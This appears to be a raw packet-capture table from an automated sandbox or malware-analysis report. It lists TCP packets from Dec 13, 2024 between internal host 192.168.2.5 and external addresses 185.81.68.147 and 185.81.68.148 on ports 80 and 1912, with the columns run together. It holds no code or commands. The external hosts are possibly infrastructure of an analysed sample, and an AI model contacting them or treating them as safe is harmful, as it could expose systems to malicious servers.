                                                                                                                                                                Dec 13, 2024 01:37:35.371633053 CET8049772185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.408241987 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.443936110 CET4976180192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:35.444436073 CET4977380192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:35.563843012 CET8049761185.81.68.148192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.564084053 CET8049773185.81.68.148192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.564201117 CET4977380192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:35.564254999 CET4976180192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:35.588182926 CET4977380192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:35.644678116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.707802057 CET8049773185.81.68.148192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.729777098 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.764358997 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.764455080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.765758038 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.781919003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.781959057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782016993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782016993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782051086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782084942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782085896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782123089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782123089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782157898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782191038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782191038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782231092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782231092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782262087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782294035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782294035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782327890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782382965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782382965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782382965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782422066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782422066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782461882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782461882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782500029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782500029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782545090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782545090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782563925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782596111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782596111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782636881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782636881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782656908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782699108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782699108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782735109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782736063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782773018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782773018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782809973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782810926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.782843113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.793796062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.793893099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.793930054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.793952942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794009924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794011116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794050932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794050932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794075012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794109106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794146061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794146061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794172049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794208050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794244051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794244051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794270992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794310093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794347048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794347048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794378996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794399023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794428110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794446945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794466019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794487000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794514894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794542074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794569969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794599056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794627905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794656992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794672966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794696093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794720888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794743061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794783115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794816017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794816017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794852972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794852972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794902086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794902086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794938087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794972897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794972897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.794998884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795046091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795046091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795078993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795109987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795109987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795154095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795154095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795186996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.795217991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809111118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809149027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809166908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809201956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809221029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809254885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809278965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809305906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809320927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809349060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809360981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809393883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809407949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809432983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809454918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809482098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809494972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809526920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809545040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809570074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809586048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809617043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809629917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809658051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809673071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809703112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809715033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809743881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809757948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809802055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809818029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809849024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809868097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809895992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809911966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809938908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809962034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.809988976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810003996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810029030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810074091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810074091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810087919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810117006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810132980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810167074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810182095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810211897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810228109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810251951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810266018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.810293913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817065001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817092896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817116976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817141056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817157030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817183971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817208052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817250967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817275047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817293882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817317009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817403078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817461967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817485094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817511082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817526102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817554951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817570925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817605972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817624092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817646980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817662954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817689896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817704916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817725897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817740917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817766905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817780018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817806959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817835093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817848921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817872047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817890882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817915916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817949057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.817962885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818205118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818238974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818476915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818490982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818515062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818541050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818562984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818583965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818608046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818631887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818650007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818670988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818686008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818711996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818734884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818758965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818783045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818805933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818821907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818844080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818865061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818892956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818907976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818932056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818962097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.818978071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819133043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819156885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819185972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819226027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819241047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819272995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819293976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819322109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819333076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819418907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819434881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819470882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819487095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819509983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819525003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819547892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819567919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819591045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819611073 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819623947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819645882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819689989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819716930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819732904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819772005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819787979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819818020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819842100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819864988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819889069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819910049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819936037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819960117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.819984913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820012093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820029974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820059061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820096970 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820122957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820142031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820168972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820190907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820216894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820231915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820260048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820282936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820306063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820334911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820362091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820386887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820405006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820483923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820514917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820552111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820578098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820605040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820626974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820652008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820677042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820698977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820723057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820748091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820775032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820796967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820820093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820841074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820866108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820889950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820914030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820950985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.820966959 CET4977580192.168.2.5185.81.68.147
